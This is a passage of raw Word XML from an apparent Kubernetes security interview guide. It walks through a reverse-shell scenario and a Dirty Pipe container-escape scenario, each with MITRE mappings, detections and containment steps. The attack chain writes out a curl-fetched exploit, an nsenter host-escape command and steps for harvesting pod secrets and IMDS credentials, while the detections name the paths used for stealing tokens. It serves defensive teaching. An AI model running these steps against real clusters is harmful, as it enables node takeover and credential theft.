          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Account Token Read Post-Exploit</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Process reads /var/run/secrets/kubernetes.io/serviceaccount/token via cat, cp, or direct open() syscall. Falcon eBPF captures the open() call and correlates it to the interactive shell session already in progress.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SuspiciousFileAccess.ServiceAccountToken | KubernetesSATokenRead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Downstream: AssumeRoleWithWebIdentity from non-VPC IP using extracted token (CIEM ExternalIRSAAbuse alert).</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Kubernetes:Audit/SuccessfulAnonymousAccess or CredentialAccess:Kubernetes/ServiceAccountSecret.</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audit event for reading the mounted secret file (it is a filesystem read, not K8s API call). Alert on downstream K8s API calls using the token from unexpected IP.</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Applications legitimately read this token at startup for AWS SDK authentication. Distinguish: is the read happening mid-session after an interactive shell was spawned? Runtime context from CWPP makes this unambiguous.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E6B6B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Outbound Data Exfiltration Volume Spike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0E6B6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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Container egress traffic volume exceeds 10x the rolling 7-day average in a 5-minute window. Falcon network telemetry combined with VPC Flow Logs shows sustained TCP upload stream to external IP.</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LargeVolumeExternalTransfer | SuspiciousNetworkEgress.Container</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If exfil uses S3 API: GetObject events at high volume from pod IP. S3 server access logs show bulk reads.</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Exfiltration:S3/AnomalousBehavior or UnauthorizedAccess:Runtime/DomainCommunication.</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Check NetworkPolicy: was egress allow-all? Audit NetworkPolicy changes in 48h before incident.</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Batch ETL jobs legitimately produce high egress. Check: (1) Is the destination IP in approved vendor list? (2) Is the timing aligned with scheduled jobs? (3) Is the process performing the transfer expected (node vs curl vs unknown binary)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment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DEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate Response Steps:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Kill pod immediately (kubectl delete pod). 2) Apply deny-all egress NetworkPolicy to namespace. 3) Rotate service account token. 4) Add IRSA trust policy source VPC condition. 5) Patch the RCE vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interview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9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">How to explain this scenario in the interview:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"Reverse shells from web containers are distinctive because the process chain is unambiguous — a web framework should never spawn bash. Falcon caught this in under 2 seconds via the execve syscall chain. The second detection layer was the first-seen domain alert. Together they created a Critical alert before any data left the cluster. The lesson: deny-all egress NetworkPolicy on every production namespace would have stopped the C2 connection entirely."</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DEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SCENARIO 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Container Escape via Privileged Pod + Dirty Pipe (CVE-2022-0847)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="4A4A4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kernel exploit → namespace escape → node compromise → cluster pivot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Technique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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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T1611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Escape to Host</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Privilege Escalation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nsenter with all namespace flags after kernel exploitation gives attacker root on the underlying EKS node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T1068</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Exploitation for Privilege Escalation</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Privilege Escalation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CVE-2022-0847 Dirty Pipe exploited to overwrite read-only files in the container, escalating to root</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T1552.007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Container API</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Credential Access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Post-escape access to kubelet API and node IMDS to harvest credentials from all pods on the node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T1021.007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Cloud Services (K8s Lateral)</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Lateral Movement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Stolen kubelet credentials used to exec into pods on the same node and pivot to other namespaces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T1485</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Data Destruction (Defense Evasion)</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Impact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Attacker attempts to clear container logs and /var/log/audit on node to reduce forensic evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack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1B2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial foothold in payments-api pod (via Stage 1 RCE)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Container has allowPrivilegeEscalation:true (misconfiguration)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Attacker downloads dirtypipe binary to /tmp via curl</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ ./dirtypipe /etc/passwd → overwrites to add root user entry</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ nsenter --target 1 --mount --pid --net --uts -- /bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Full root shell on EKS node</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Access /var/lib/kubelet/pods/*/volumes/secrets → harvest ALL pod secrets on node</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Access http://169.254.169.254 → steal node instance profile credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Pivot to second namespace using harvested service account tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Detections with Full Telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty Pipe Kernel Exploit Syscall Sequence</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Falcon ML model fires on the exact syscall sequence of CVE-2022-0847: open(O_WRONLY) → splice() → write(pipe_offset=0). This sequence on a system file (/etc/passwd, /etc/shadow) from within a container process is the Dirty Pipe exploit signature at the kernel level.</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PotentialKernelTampering | ExploitationForPrivilegeEscalation | Severity: Critical</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CloudTrail for in-kernel operations. After escape: IMDS access visible in VPC Flow Logs (169.254.169.254 from node IP).</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PrivilegeEscalation:Runtime/RuncContainerEscape or PrivilegeEscalation:Runtime/ContainerMountedSensitiveFile.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Prior admission: was allowPrivilegeEscalation:true flagged by KAC? If KAC was in DETECT mode only, this is the enforcement gap.</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The splice()+write(pipe_offset=0) on a system-owned read-only file is not a legitimate application operation under any circumstance. Zero false positives expected. PREVENT mode should kill the process mid-syscall before exploitation completes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">nsenter with Full Host Namespace Flags</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Process executes nsenter --target 1 --mount --uts --ipc --net --pid. All five namespace flags together indicate a container escape attempt targeting PID 1 (the host init process). Falcon captures the execve() call with the complete argument vector.</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ContainerEscape.NsenterToHostNamespace | InteractiveContainerSession | Severity: Critical → PREVENT (process killed)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After escape attempt (if not prevented): IMDS GetSecurityCredentials from instance IP at unusual time.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UnauthorizedAccess:EC2/MetadataAccess if credentials are used from unusual source after escape.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Pod spec at admission: did KAC flag privileged:true, hostPID:true? Check KAC deny logs for this pod.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nsenter with --target 1 and all namespace flags has exactly one use: container escape. No legitimate application or monitoring tool needs this combination. In debug namespaces, nsenter may be used but never with --target 1 (host init). PREVENT mode should always be active for this detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive Tool Drop to /tmp (Container Drift)</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New executable written to /tmp/.hidden/ post-container-start. SHA256 of dirtypipe binary matches known exploit tool hash in Falcon threat intelligence. Drift engine detects the write because the file was not in the original container image layers (cryptographic baseline mismatch).</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ContainerDrift.OffensiveToolDrop | SHA256 match: CVE-2022-0847 exploit binary</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If tool downloaded via S3 or HTTPS: VPC Flow Logs show connection to download server. curl process egress.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Trojan:Runtime/DropperBehavior or MaliciousFile finding if hash in GuardDuty threat intel.</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direct K8s audit. Was readOnlyRootFilesystem:true enforced by KAC? If so, the curl write would have been blocked at the filesystem level.</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Drift alerts fire when ANY new executable appears post-start. Differentiate: (1) Is the SHA256 in threat intel? (2) Is it in /tmp/.hidden/ (attacker TTPs use hidden dirs)? (3) Was it downloaded by curl/wget vs installed by a package manager? All three = confirmed malicious.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bulk Secret Harvest from Node Filesystem</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Post-escape process reads multiple files matching pattern /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token in rapid succession. Falcon eBPF captures the glob traversal via a series of open() and read() syscalls on the kubelet pod volume directory.</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MassSecretHarvest.KubeletPodVolumes | CredentialAccess.ContainerSecrets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Downstream: Multiple AssumeRoleWithWebIdentity calls using harvested tokens from external IP within hours.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CredentialAccess:Kubernetes/MaliciousIPCallerKubernetesServiceAccountToken.</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Subsequent API calls using harvested tokens from new IP addresses — verb: list secrets, get secrets across namespaces.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The kubelet pod volume directory is never accessed by legitimate application processes. Only the kubelet itself and Falcon sensor have legitimate reasons to traverse this path. Any other process accessing it post-escape is malicious with near certainty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Node IMDS Credential Theft Post-Escape</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Process running with UID 0 (root) on the host makes HTTP request to 169.254.169.254/latest/meta-data/iam/security-credentials/&lt;role&gt;. Falcon captures the network connection and correlates it to the post-escape interactive session (same process tree, same PID namespace).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IMDSCredentialTheft.PostEscape | SuspiciousIMDSAccess.PrivilegedProcess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GetSecurityToken from EC2 instance followed by API calls from external IP using those credentials (AssumeRole, ListBuckets).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UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS when credentials used externally.</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Indirectly: subsequent unauthorized API calls to K8s API server using the node's kubelet certificate (if stolen).</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IMDS access from a process that is NOT the expected application SDK call is suspicious. After a confirmed container escape (Detections 1-3 already fired), this detection confirms the attacker has escalated to node-level credential access. Enforce IMDSv2 with hop limit=1 to prevent IMDS access from containers entirely.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment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DEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate Response Steps:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1) PREVENT mode kills nsenter mid-execution. 2) Pod quarantined via auto-applied NetworkPolicy. 3) Node cordoned and drained immediately. 4) Rotate ALL secrets and service accounts from affected node. 5) Patch kernel to version not vulnerable to Dirty Pipe. 6) Enforce readOnlyRootFilesystem and drop CAP_NET_ADMIN via KAC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interview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9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">How to explain this scenario in the interview:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"Dirty Pipe is a kernel-level exploit — the only thing that stops it at execution is a CWPP sensor watching syscall sequences. The KAC prevents the privileged pod from deploying in the first place. But if KAC is in DETECT-only mode, you need the CWPP PREVENT layer. I test both layers monthly in a lab environment. The question I ask in every environment I join: what happens if KAC fails? CWPP PREVENT mode is the answer."</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9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
